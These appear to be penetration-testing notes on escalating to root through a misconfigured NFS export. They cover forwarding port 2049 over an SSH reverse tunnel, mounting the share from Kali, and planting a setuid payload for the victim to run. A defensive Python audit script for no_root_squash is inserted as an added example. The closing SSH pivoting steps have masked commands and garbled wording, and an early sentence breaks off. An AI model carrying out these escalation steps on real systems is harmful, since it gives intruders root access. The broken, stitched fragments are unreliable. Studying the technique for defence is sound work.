Discover the vulnerability with `cat /etc/exports` and see if a directory is configured as
- it might restrict the IP
If it only accepts traffic from internal addresses, i.e. 127.0.0.1, consider remote port forwarding.
If you have access to the target machine via SSH, this is easy.
1. `ssh -N -R kali_IP:2049:127.0.0.1:2049 kali@kali_IP`
This command takes port 2049 (NFS), open on the target's localhost, and forwards it to Kali on the same port.
Check that the port is listening on localhost (nmap it).
1. (kali) Mount the folder: `mount -t nfs 127.0.0.1:/sharename /tmp/pa` (create this folder on Kali first)
2. (kali) Create the payload with gedit
3. (kali) `chmod +s` it
4. (victim) cd to the folder and run it.
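For the defender's side of the `/etc/exports` check above, here is an added example (not part of the original notes) that audits an exports file for entries that leave root unsquashed. It assumes the option being looked for is `no_root_squash`; the sample file content and the name `audit_exports` are constructed for illustration.

```python
import re
import shlex

# Constructed sample /etc/exports content (not from a real host).
SAMPLE_EXPORTS = """\
/srv/backup   127.0.0.1(rw,sync,no_root_squash)
/srv/public   *(ro,sync,root_squash)
/home/shared  192.168.56.0/24(rw,sync) \\
              10.0.0.5(rw,no_root_squash)
/srv/scratch  -rw,no_root_squash localhost   # default options form
"""

CLIENT_RE = re.compile(r"^(?P<host>[^()]*)(?:\((?P<opts>[^()]*)\))?$")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def audit_exports(text):
    """Return (path, client, note) for each export that leaves root unsquashed."""
    findings = []
    # Join backslash-continued lines, then tokenise (shlex drops '#' comments).
    for line in text.replace("\\\n", " ").splitlines():
        tokens = shlex.split(line, comments=True)
        if not tokens:
            continue
        path, defaults = tokens[0], set()
        for tok in tokens[1:]:
            if tok.startswith("-"):
                # "-opt,opt" sets default options for the clients after it.
                defaults = set(tok[1:].split(","))
                continue
            m = CLIENT_RE.match(tok)
            if not m:
                continue
            host = m.group("host") or "*"  # "(opts)" alone means any client
            own = [o for o in (m.group("opts") or "").split(",") if o]
            opts = defaults | set(own)
            if "root_squash" in own:  # a per-client option beats the default
                opts.discard("no_root_squash")
            # all_squash maps every uid, root included, to the anonymous user.
            if "no_root_squash" in opts and "all_squash" not in opts:
                note = ("loopback-only, still reachable through a local port forward"
                        if host in LOOPBACK else "root on this client keeps uid 0")
                findings.append((path, host, note))
    return findings


if __name__ == "__main__":
    for path, host, note in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {host}: no_root_squash ({note})")
```

An export limited to 127.0.0.1 is reported as well, because anyone who can log in over SSH can forward the NFS port, as the steps above show.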
Is your SSH open?
`systemctl status sshd`
`sudo systemctl start sshd` (if it's not running)
Command 1 (from this machine): ssh -* -* ::: You are required to use the credential.
- 1. Go back to the pivot and check; you will see a port listening.
Command 2: ssh -*** -* ::: You are required to use the credential to your machine.
- 1. Go back to your machine and check; you will see a port listening.
- 2. nmap your local IP address and the given port number; you will see the service running.
That means your work is correct.